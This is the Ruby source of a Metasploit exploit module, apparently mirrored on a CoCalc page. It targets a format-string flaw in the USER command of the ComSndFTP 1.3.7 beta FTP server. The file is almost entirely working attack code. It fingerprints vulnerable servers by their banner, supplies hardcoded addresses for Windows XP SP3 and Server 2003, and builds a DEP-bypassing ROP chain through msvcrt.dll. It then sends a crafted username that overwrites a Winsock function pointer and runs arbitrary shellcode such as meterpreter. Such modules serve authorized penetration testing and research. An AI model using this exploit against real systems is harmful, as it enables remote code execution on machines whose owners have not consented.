Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb
19778 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GoodRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'ComSndFTP v1.3.7 Beta USER Format String (Write4) Vulnerability',

16
        'Description' => %q{

17
          This module exploits the ComSndFTP FTP Server version 1.3.7 beta by sending a specially

18
          crafted format string specifier as a username. The crafted username is sent to the server to

19
          overwrite the hardcoded function pointer from Ws2_32.dll!WSACleanup. Once this function pointer

20
          is triggered, the code bypasses dep and then repairs the pointer to execute arbitrary code.

21
          The SEH exit function is preferred so that the administrators are not left with an unhandled

22
          exception message. When using the meterpreter payload, the process will never die, allowing

23
          for continuous exploitation.

24
        },

25
        'Author' => [

26
          'ChaoYi Huang <ChaoYi.Huang[at]connect.polyu.hk>', # vuln discovery + poc

27
          'rick2600 <rick2600[at]corelan.be>',               # msf module (target XP)

28
          'mr_me <mr_me[at]corelan.be>',                     # msf module (target 23k)

29
          'corelanc0d3r <peter.ve[at]corelan.be>'            # msf module

30
        ],

31
        'Arch' => [ ARCH_X86 ],

32
        'License' => MSF_LICENSE,

33
        'References' => [

34
          # When a DoS is NOT a DoS

35
          [ 'OSVDB', '82798'],

36
          [ 'EDB', '19024']

37
        ],

38
        'DefaultOptions' => {

39
          'EXITFUNC' => 'seh'

40
        },

41
        'Platform' => ['win'],

42
        'Privileged' => false,

43
        'Payload' => {

44
          'Space' => 1000,

45
          'BadChars' => "\x00\x0a\x0d",

46
          'StackAdjustment' => -3500,

47
          'DisableNops' => true

48
        },

49
        'Targets' => [

50
          [

51
            'Windows XP SP3 - English',

52
            {

53
              'Functionpointer' => 0x71AC4050,  # winsock pointer

54
              'Functionaddress' => 0x71AB2636,  # the repair address

55
              'Pivot' => 0x00408D16, # 0x004093AE-0x698 add esp, 72c ; retn

56
              'Pad' => 568

57
            }

58
          ],

59
          [

60
            'Windows Server 2003 - English',

61
            {

62
              'Functionpointer' => 0x71C14044,  # winsock pointer

63
              'Functionaddress' => 0x71C02661,  # the repair address

64
              'Pivot' => 0x00408D16, # 0x004093AE-0x698 add esp, 72c ; retn

65
              'Pad' => 568

66
            }

67
          ]

68
        ],

69
        'DisclosureDate' => '2012-06-08',

70
        'Notes' => {

71
          'Reliability' => UNKNOWN_RELIABILITY,

72
          'Stability' => UNKNOWN_STABILITY,

73
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

74
        }

75
      )

76
    )

77


78
    register_options(

79
      [

80
        Opt::RPORT(21),

81
      ]

82
    )

83
  end

84


85
  def check

86
    connect

87
    banner = sock.get_once || ""

88
    disconnect

89


90
    validate = "\x32\x32\x30\x20\xbb\xb6\xd3\xad\xb9"

91
    validate << "\xe2\xc1\xd9\x46\x54\x50\xb7\xfe\xce"

92
    validate << "\xf1\xc6\xf7\x21\x0d\x0a"

93


94
    if banner.to_s == validate

95
      return Exploit::CheckCode::Vulnerable

96
    end

97


98
    return Exploit::CheckCode::Safe

99
  end

100


101
  def junk(n = 4)

102
    return rand_text_alpha(n).unpack("V").first

103
  end

104


105
  def exploit

106
    rop = ''

107
    if target.name =~ /Server 2003/

108
      # C:\WINDOWS\system32\msvcrt.dll v7.0.3790.3959

109
      rop = [

110
        0x77be3adb, # pop eax ; retn

111
        0x77ba1114, # <- *&VirtualProtect()

112
        0x77bbf244, # mov eax,[eax] ; pop ebp ; retn

113
        junk,

114
        0x77bb0c86, # xchg eax,esi ; retn

115
        0x77be3adb, # pop eax ; retn

116
        0xFFFFFBFF, # dwSize

117
        0x77BAD64D, # neg eax ; pop ebp ; retn

118
        junk,

119
        0x77BBF102, # xchg eax,ebx ; add [eax],al ; retn

120
        0x77bbfc02, # pop ecx ; retn

121
        0x77bef001, # ptr that is w+

122
        0x77bd8c04, # pop edi ; retn

123
        0x77bd8c05, # retn

124
        0x77be3adb, # pop eax ; retn

125
        0xFFFFFFC0, # flNewProtect

126
        0x77BAD64D, # neg eax ; pop ebp ; retn

127
        0x77be2265, # ptr to 'push esp ; ret'

128
        0x77BB8285, # xchg eax,edx ; retn

129
        0x77be3adb, # pop eax ; retn

130
        0x90909090, # nops

131
        0x77be6591, # pushad ; add al,0ef ; retn

132
      ].pack("V*")

133


134
    elsif target.name =~ /XP SP3/

135
      # C:\WINDOWS\system32\msvcrt.dll v7.0.2600.5512

136
      rop = [

137
        0x77C21D16, # pop eax ; retn

138
        0x77C11120, # <- *&VirtualProtect()

139
        0x77C2E493, # mov eax,[eax] ; pop ebp ; retn

140
        junk,

141
        0x77C21891, # pop esi ; retn

142
        0x77C5D010, # ptr that is w+

143
        0x77C2DD6C, # xchg eax,esi ; add [eax],al; retn

144
        0x77C21D16, # pop eax ; retn

145
        0xFFFFFBFF, # dwSize

146
        0x77C1BE18, # neg eax ; pop ebp ; retn

147
        junk,

148
        0x77C2362C, # pop ebx ; retn

149
        0x77C5D010, # ptr that is w+

150
        0x77C2E071, # xchg eax,ebx ; add [eax],al ; retn

151
        0x77C1F519, # pop ecx ; retn

152
        0x77C5D010, # ptr that is w+

153
        0x77C23B47, # pop edi ; retn

154
        0x77C23B48, # retn

155
        0x77C21D16, # pop eax ; retn

156
        0xFFFFFFC0, # flNewProtect

157
        0x77C1BE18, # neg eax ; pop ebp ; retn

158
        0x77C35459, # ptr to 'push esp ; ret'

159
        0x77C58FBC, # xchg eax,edx ; retn

160
        0x77C21D16, # pop eax ; retn

161
        0x90909090, # nops

162
        0x77C567F0, # pushad ; add al,0ef ; retn

163
      ].pack("V*")

164
    end

165


166
    stage1 = %Q{

167
      mov eax, #{target['Functionpointer']}

168
      mov ecx, #{target['Functionaddress']}

169
      mov [eax], ecx

170
    }

171


172
    offset_wp = rand_text_alphanumeric(1)

173
    pivot = target['Pivot']

174
    offset = target['Pad'] + rop.length + stage1.length + payload.encoded.length

175


176
    attackstring = rand_text_alphanumeric(7)

177
    attackstring << [target['Functionpointer']].pack('V')

178
    attackstring << "%#{pivot}x" # special pointer to our pivot

179
    attackstring << "%p" * 208 + "#{offset_wp}%n" # format specifiers to read and write the function pointer

180
    attackstring << rand_text_alphanumeric(target['Pad'])

181
    attackstring << rop

182
    attackstring << Metasm::Shellcode.assemble(Metasm::Ia32.new, stage1).encode_string

183
    attackstring << payload.encoded

184
    attackstring << rand_text_alphanumeric(2000 - offset)

185
    attackstring << "\r\n"

186


187
    sploit = "USER #{attackstring}\r\n"

188


189
    print_status("Triggering overflow...")

190
    connect

191
    sock.get_once(1024)

192
    sock.put(sploit)

193
    select(nil, nil, nil, 2)

194
    handler

195
    disconnect

196
  end

197
end

198


199